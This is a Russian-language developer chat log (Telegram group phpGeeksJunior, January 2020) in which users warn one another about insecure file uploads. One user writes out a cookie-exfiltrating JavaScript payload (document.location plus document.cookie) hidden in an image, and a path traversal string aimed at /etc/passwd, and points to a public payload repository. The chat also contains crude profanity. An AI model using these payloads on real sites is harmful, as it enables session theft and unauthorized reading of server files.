Size: a a a

2020 January 15

S

SarcasmIO in phpGeeksJunior
если на пхп
источник

S

SarcasmIO in phpGeeksJunior
то очевидно да
источник

S

SarcasmIO in phpGeeksJunior
а это хуета пхплиги
источник

S

SarcasmIO in phpGeeksJunior
ахахаха
источник

S

SarcasmIO in phpGeeksJunior
все
источник

V

Vladimir in phpGeeksJunior
S3 тоже клоуны пользуются?
источник

S

SarcasmIO in phpGeeksJunior
ты победил
источник

S

SarcasmIO in phpGeeksJunior
расскажи всем во дворе
источник

АП

Алексей Пастушенко... in phpGeeksJunior
я спать.. ато чет вторник все никак не заканчивается
источник

S

SarcasmIO in phpGeeksJunior
крч, вдруг между делом, тут кому-то стало интересно, просто стоило ответить на вопрос, что будет если имеется картинка, с подмененным mime type загруженная на cdn содержащая в себе document.location='url'+document.cookie
и которая по итогу будет выведена через img src где-то на сайте, рекомендую задуматься
еще в пыльных двухтысячных везде пихали svg/gif на всратых форумах и собирали стиллерами куки со всех
еще с 1997-го года


imageTragick не просто так появилась шняга

а если зайти сюда и посмотреть https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/README.md#php-extension

то можно и кейс с загрузкой через curl —binary с application/octet-stream и последующим удаленным вызовом посмотреть просто нажав CTRL+F в репе и проскролить до первого матча

сходите на шаг назад в репе, это только то, что умельцы собрали ради фана

не говоря уже, допустим, о том, что многие статику отдают nginx'ом, допустим
вот последняя cve с удаленным выполнением кода
https://www.nginx.com/blog/php-fpm-cve-2019-11043-vulnerability-nginx/
уязвимый конфиг которого можно было найти у slim фреймворка, на сайте
источник

S

SarcasmIO in phpGeeksJunior
в большинстве случаев, ты енивей будешь уязвим но жив и цел, пока превалируемый профит явно меньше трудозатрат, но показывать наружу кишки, а самый просто способ получить path traversal как раз что то зааплодить, допустим написать новость на новостной сайт и получить картинку с, uploads/images/123.jpg допустим
источник

S

SarcasmIO in phpGeeksJunior
поверьте мне, сайтов, которые написанны в 2000-е или еще хуже в 2020-е но теми же уебанами, которые схавают /../../../../../etc/passwd
источник

S

SarcasmIO in phpGeeksJunior
дохуища
источник

M

Maestro in phpGeeksJunior
Завтра у себя проверю
источник

M

Maestro in phpGeeksJunior
Схавает или нет, а то мало ли
источник

S

SarcasmIO in phpGeeksJunior
кавычек еще везде наставь
источник

S

SarcasmIO in phpGeeksJunior
))
источник

АП

Алексей Пастушенко... in phpGeeksJunior
SarcasmIO
поверьте мне, сайтов, которые написанны в 2000-е или еще хуже в 2020-е но теми же уебанами, которые схавают /../../../../../etc/passwd
+++
источник

АП

Алексей Пастушенко... in phpGeeksJunior
и даже в именитых платформах такого говна темный лет
источник

S

SarcasmIO in phpGeeksJunior
кмон, вконтач 4 недели назад паблик дискложур на этой основе сделал
источник